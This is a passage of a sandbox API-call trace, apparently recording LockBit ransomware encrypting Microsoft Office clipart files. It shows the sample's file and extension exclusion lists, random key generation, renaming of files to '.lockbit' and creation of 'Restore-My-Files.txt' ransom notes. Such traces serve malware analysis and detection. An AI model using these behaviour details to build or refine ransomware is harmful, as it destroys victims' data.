Office\\CLIPART\\PUB60COR\\SO00670_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.692] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.692] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.694] free (_Block=0x1fa2ed8) [0175.694] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00670_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.694] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.694] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.694] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00671_.WMF", cAlternateFileName="")) returned 1 [0175.694] lstrcmpiW (lpString1=".", lpString2="SO00671_.WMF") returned -1 [0175.694] lstrcmpiW (lpString1="..", lpString2="SO00671_.WMF") returned -1 [0175.694] PathFindExtensionW (pszPath="SO00671_.WMF") returned=".WMF" [0175.694] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.694] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.694] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.694] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.694] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.694] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.694] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.694] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.694] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.695] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.695] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00671_.WMF") returned -1 [0175.696] lstrcmpiW (lpString1="ntldr", lpString2="SO00671_.WMF") returned -1 [0175.696] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00671_.WMF") returned -1 [0175.696] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00671_.WMF") returned -1 [0175.696] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00671_.WMF") returned -1 [0175.696] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00671_.WMF") returned 1 [0175.696] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00671_.WMF") returned -1 [0175.696] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.696] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00671_.WMF") returned=".WMF" [0175.696] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.696] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.696] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.697] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.697] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00671_.WMF.lockbit") returned 72 [0175.697] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00671_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00671_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.699] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.699] malloc (_Size=0x40068) returned 0x3df0008 [0175.699] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1488) returned 1 [0175.699] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.699] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.699] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.700] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.706] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00671_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00671_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.706] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.706] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.707] free (_Block=0x1fa2ed8) [0175.707] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00671_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.707] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.708] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.708] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f14c400, ftCreationTime.dwHighDateTime=0x1bd4b0c, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7f14c400, ftLastWriteTime.dwHighDateTime=0x1bd4b0c, nFileSizeHigh=0x0, nFileSizeLow=0x62b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00683_.WMF", cAlternateFileName="")) returned 1 [0175.708] lstrcmpiW (lpString1=".", lpString2="SO00683_.WMF") returned -1 [0175.708] lstrcmpiW (lpString1="..", lpString2="SO00683_.WMF") returned -1 [0175.708] PathFindExtensionW (pszPath="SO00683_.WMF") returned=".WMF" [0175.708] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.708] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.709] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.709] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00683_.WMF") returned -1 [0175.709] lstrcmpiW (lpString1="ntldr", lpString2="SO00683_.WMF") returned -1 [0175.710] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00683_.WMF") returned -1 [0175.710] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00683_.WMF") returned -1 [0175.710] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00683_.WMF") returned -1 [0175.710] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00683_.WMF") returned 1 [0175.710] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00683_.WMF") returned -1 [0175.710] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.710] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00683_.WMF") returned=".WMF" [0175.710] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.710] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.710] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.711] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.711] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.711] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.711] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.711] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.711] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.711] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.711] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00683_.WMF.lockbit") returned 72 [0175.711] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00683_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00683_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.717] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.717] malloc (_Size=0x40068) returned 0x3df0008 [0175.717] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=25270) returned 1 [0175.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.718] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.718] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.720] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00683_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00683_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.720] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.720] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.724] free (_Block=0x1fa2ed8) [0175.724] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00683_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.724] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.724] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.724] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6302, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00694_.WMF", cAlternateFileName="")) returned 1 [0175.724] lstrcmpiW (lpString1=".", lpString2="SO00694_.WMF") returned -1 [0175.725] lstrcmpiW (lpString1="..", lpString2="SO00694_.WMF") returned -1 [0175.725] PathFindExtensionW (pszPath="SO00694_.WMF") returned=".WMF" [0175.725] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.725] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.726] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.726] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00694_.WMF") returned -1 [0175.726] lstrcmpiW (lpString1="ntldr", lpString2="SO00694_.WMF") returned -1 [0175.726] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00694_.WMF") returned -1 [0175.726] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00694_.WMF") returned -1 [0175.727] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00694_.WMF") returned -1 [0175.727] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00694_.WMF") returned 1 [0175.727] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00694_.WMF") returned -1 [0175.727] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.727] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00694_.WMF") returned=".WMF" [0175.727] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.727] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.727] lstrcmpiW 